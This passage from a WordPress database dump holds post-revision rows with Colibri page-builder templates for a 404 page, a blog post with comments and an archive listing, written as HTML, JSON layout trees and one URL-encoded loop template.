h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-133 style-local-37-m3 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"37-m4\" class=\"h-global-transition-all h-heading style-134 style-local-37-m4 position-relative h-element\">\n              <!---->\n              <!---->\n              <h2 class=\"\">404</h2>\n            </div>\n            <div data-colibri-id=\"37-m5\" class=\"h-text h-text-component style-135 style-local-37-m5 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Sorry, page not found!</p>\n              </div>\n            </div>\n            <div data-colibri-id=\"37-m6\" class=\"h-x-container style-136 style-local-37-m6 position-relative h-element\">\n              <!---->\n              <div class=\"h-x-container-inner style-dynamic-37-m6-group\">\n                <!----><span class=\"h-button__outer style-137-outer style-local-37-m7-outer d-inline-flex h-element\"><a  h-use-smooth-scroll=\"true\" href=\"[colibri_home_url]\"  data-colibri-id=\"37-m7\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-137 style-local-37-m7 position-relative\"><!----><!----> <span >Go to Homepage!</span>                <span class=\"h-svg-icon h-button__icon style-137-icon style-local-37-m7-icon\"><!--Icon by Icons8 Line Awesome (https://icons8.com/line-awesome)-->[colibri_svg_icon name=icons8-line-awesome/arrow-right]</span></a>\n                </span>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_404','','inherit','closed','closed','','37-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',37,'https://gsudice.dataconn.net/?p=60',0,'revision','',0),(61,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"31-m27\",\"parentId\":\"31-m26\",\"partialId\":31,\"styleRef\":70,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"31-m28\",\"parentId\":\"31-m26\",\"partialId\":31,\"styleRef\":71,\"type\":\"main\"}],\"id\":\"31-m26\",\"parentId\":\"31-m25\",\"partialId\":31,\"styleRef\":69,\"type\":\"main\"}],\"id\":\"31-m25\",\"parentId\":\"31-m2\",\"partialId\":31,\"styleRef\":68,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-post-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-thumbnail\",\"id\":\"31-m5\",\"parentId\":\"31-m4\",\"partialId\":31,\"styleRef\":74,\"type\":\"main\",\"props\":{\"showPlaceholder\":false,\"addLink\":false}},{\"name\":\"hop-row\",\"id\":\"31-m6\",\"parentId\":\"31-m4\",\"partialId\":31,\"styleRef\":75,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"id\":\"31-m7\",\"parentId\":\"31-m6\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-meta\",\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m8\",\"partialId\":31,\"styleRef\":77,\"type\":\"main\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"showIcons\":false,\"separator\":\"\"}},{\"name\":\"hop-post-content\",\"parentId\":\"31-m7\",\"id\":\"31-m9\",\"partialId\":31,\"styleRef\":78,\"type\":\"main\"},{\"name\":\"hop-post-categories-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"31-m11\",\"parentId\":\"31-m10\",\"partialId\":31,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"31-m11\",\"index\":0,\"id\":\"31-m12\",\"partialId\":31,\"styleRef\":81,\"type\":\"main\",\"props\":{\"content\":\"<p>Categories:<\\/p>\"}}],\"styleRef\":80,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"31-m13\",\"parentId\":\"31-m10\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-categories\",\"slot\":null,\"parentId\":\"31-m13\",\"index\":0,\"id\":\"31-m14\",\"partialId\":31,\"styleRef\":83,\"type\":\"main\"}],\"styleRef\":82,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m10\",\"partialId\":31,\"styleRef\":79,\"type\":\"main\"},{\"name\":\"hop-post-tags-container\",\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m15\",\"partialId\":31,\"styleRef\":84,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"31-m16\",\"parentId\":\"31-m15\",\"partialId\":31,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"31-m16\",\"index\":0,\"id\":\"31-m17\",\"partialId\":31,\"styleRef\":86,\"type\":\"main\",\"props\":{\"content\":\"<p>Tags:<\\/p>\"}}],\"styleRef\":85,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"31-m18\",\"parentId\":\"31-m15\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-tags\",\"slot\":null,\"parentId\":\"31-m18\",\"index\":2,\"id\":\"31-m19\",\"partialId\":31,\"styleRef\":88,\"type\":\"main\",\"props\":{\"prefix\":\"\"}}],\"styleRef\":87,\"type\":\"main\"}]}],\"styleRef\":76,\"type\":\"main\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}}}],\"slot\":null,\"index\":1},{\"name\":\"hop-post-nav-container\",\"parentId\":\"31-m4\",\"id\":\"31-m20\",\"partialId\":31,\"styleRef\":89,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"31-m21\",\"parentId\":\"31-m20\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-nav-button\",\"slot\":null,\"parentId\":\"31-m21\",\"index\":0,\"id\":\"31-m22\",\"partialId\":31,\"styleRef\":91,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"showPostTitle\":false,\"prevLabel\":\"Previous post\",\"postTitleLength\":\"40\",\"stateType\":\"\"}}],\"styleRef\":90,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"31-m23\",\"parentId\":\"31-m20\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-nav-button\",\"slot\":null,\"parentId\":\"31-m23\",\"index\":0,\"id\":\"31-m24\",\"partialId\":31,\"styleRef\":93,\"type\":\"main\",\"props\":{\"nextLabel\":\"Next post\",\"showPostTitle\":false,\"stateType\":\"\"}}],\"styleRef\":92,\"type\":\"main\"}],\"slot\":null,\"index\":2}],\"id\":\"31-m4\",\"parentId\":\"31-m3\",\"partialId\":31,\"styleRef\":73,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"31-m2\",\"index\":0,\"id\":\"31-m3\",\"partialId\":31,\"styleRef\":72,\"type\":\"main\"}],\"parentId\":\"31-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Blog Post\",\"attrs\":{\"id\":\"blog-post\"}},\"id\":\"31-m2\",\"partialId\":31,\"styleRef\":67},{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"31-m36\",\"parentId\":\"31-m35\",\"partialId\":31,\"styleRef\":97,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"31-m37\",\"parentId\":\"31-m35\",\"partialId\":31,\"styleRef\":98,\"type\":\"main\"}],\"id\":\"31-m35\",\"parentId\":\"31-m34\",\"partialId\":31,\"styleRef\":96,\"type\":\"main\"}],\"id\":\"31-m34\",\"parentId\":\"31-m29\",\"partialId\":31,\"styleRef\":95,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"31-m31\",\"parentId\":\"31-m30\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-comments\",\"slot\":null,\"parentId\":\"31-m31\",\"index\":0,\"id\":\"31-m32\",\"partialId\":31,\"styleRef\":101,\"type\":\"main\",\"props\":{\"multipleTitle\":\"{COMMENTS-COUNT} Responses\",\"avatarSize\":30,\"noneTitle\":\"No responses yet\"}},{\"name\":\"hop-post-comment-form\",\"id\":\"31-m33\",\"parentId\":\"31-m31\",\"partialId\":31,\"styleRef\":102,\"type\":\"main\"}],\"styleRef\":100,\"type\":\"main\"}],\"id\":\"31-m30\",\"parentId\":\"31-m29\",\"partialId\":31,\"styleRef\":99,\"type\":\"main\"}],\"parentId\":\"31-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Comments\",\"attrs\":{\"id\":\"comments\"}},\"id\":\"31-m29\",\"partialId\":31,\"styleRef\":94}],\"id\":\"31-m1\",\"partialId\":31,\"styleRef\":66,\"type\":\"main\"}','','','inherit','closed','closed','','32-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',32,'https://gsudice.dataconn.net/?p=61',0,'revision','',0),(62,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"31-m1\" class=\"style-66 style-local-31-m1 h-overflow-hidden position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"31-m2\" id=\"blog-post\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-67 style-local-31-m2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"31-m3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 colibri-dynamic-list colibri-single-post-loop style-72 style-local-31-m3 position-relative\">\n        <!---->\n        <div data-colibri-component=\"\" class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <!---->[colibri_loop]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-73-outer%20style-local-31-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22432-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-73%20style-local-31-m4%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%22432-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20colibri-post-thumbnail-has-placeholder%20style-74%20style-local-31-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-31-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22false%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22432-m6%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-75%20style-local-31-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-76-outer%20style-local-31-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-76%20style-local-31-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m8%22%20class=%22h-blog-meta%20style-77%20style-local-31-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22432-m9%22%20class=%22style-78%20style-local-31-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%20colibri-post-content%22%3E%5Bcolibri_post_content%5D%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m10%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-79%20style-local-31-m10%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-80-outer%20style-local-31-m11-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m11%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-80%20style-local-31-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m12%22%20class=%22h-text%20h-text-component%20style-81%20style-local-31-m12%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ECategories:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20style-82-outer%20style-local-31-m13-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-82%20style-local-31-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m14%22%20class=%22h-blog-categories%20style-83%20style-local-31-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%5Bcolibri_layout_wrapper%20name=%22tags_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m15%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-84%20style-local-31-m15%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-center%20align-items-md-center%20align-items-center%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-85-outer%20style-local-31-m16-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m16%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-85%20style-local-31-m16%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m17%22%20class=%22h-text%20h-text-component%20style-86%20style-local-31-m17%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ETags:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-87-outer%20style-local-31-m18-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m18%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-87%20style-local-31-m18%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m19%22%20class=%22h-blog-tags%20empty-preview%20style-88%20style-local-31-m19%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_tags%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22navigation_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m20%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-89%20style-local-31-m20%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-90-outer%20style-local-31-m21-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m21%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-90%20style-local-31-m21%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m22%22%20class=%22post-nav-button%20hide-title%20style-91%20style-local-31-m22%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22prev%22%20prev_post=%22Previous%20post%22%20next_post=%22Next%20post:%22%20show_title=%22false%22%20title_length=%2240%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-92-outer%20style-local-31-m23-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m23%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-92%20style-local-31-m23%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m24%22%20class=%22post-nav-button%20hide-title%20style-93%20style-local-31-m24%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22next%22%20prev_post=%22Previous%20post:%22%20next_post=%22Next%20post%22%20show_title=%22false%22%20title_length=%2230%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n          </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"31-m29\" id=\"comments\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-94 style-local-31-m29 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"31-m30\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-99 style-local-31-m30 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-100-outer style-local-31-m31-outer\">\n            <div data-colibri-id=\"31-m31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-100 style-local-31-m31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"31-m32\" class=\"style-101 style-local-31-m32 position-relative\">\n                  <!---->\n                  <div class=\"h-global-transition-all blog-post-comments\">[colibri_post_comments none=\"No responses yet\" one=\"One response\" multiple=\"{COMMENTS-COUNT} Responses\" disabled=\"Comments are closed\" avatar_size=\"30\"]</div>\n                </div>\n                <div data-colibri-id=\"31-m33\" class=\"position-relative\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_post_comment_form]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_post','','inherit','closed','closed','','31-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',31,'https://gsudice.dataconn.net/?p=62',0,'revision','',0),(63,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"34-m27\",\"parentId\":\"34-m26\",\"partialId\":34,\"styleRef\":107,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"34-m28\",\"parentId\":\"34-m26\",\"partialId\":34,\"styleRef\":108,\"type\":\"main\"}],\"id\":\"34-m26\",\"parentId\":\"34-m25\",\"partialId\":34,\"styleRef\":106,\"type\":\"main\"}],\"id\":\"34-m25\",\"parentId\":\"34-m2\",\"partialId\":34,\"styleRef\":105,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-archive-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-thumbnail\",\"slot\":null,\"parentId\":\"34-m4\",\"index\":0,\"id\":\"34-m5\",\"partialId\":34,\"styleRef\":111,\"type\":\"main\",\"props\":{\"showPlaceholder\":false}},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"100\"}}}}},\"id\":\"34-m7\",\"parentId\":\"34-m6\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"A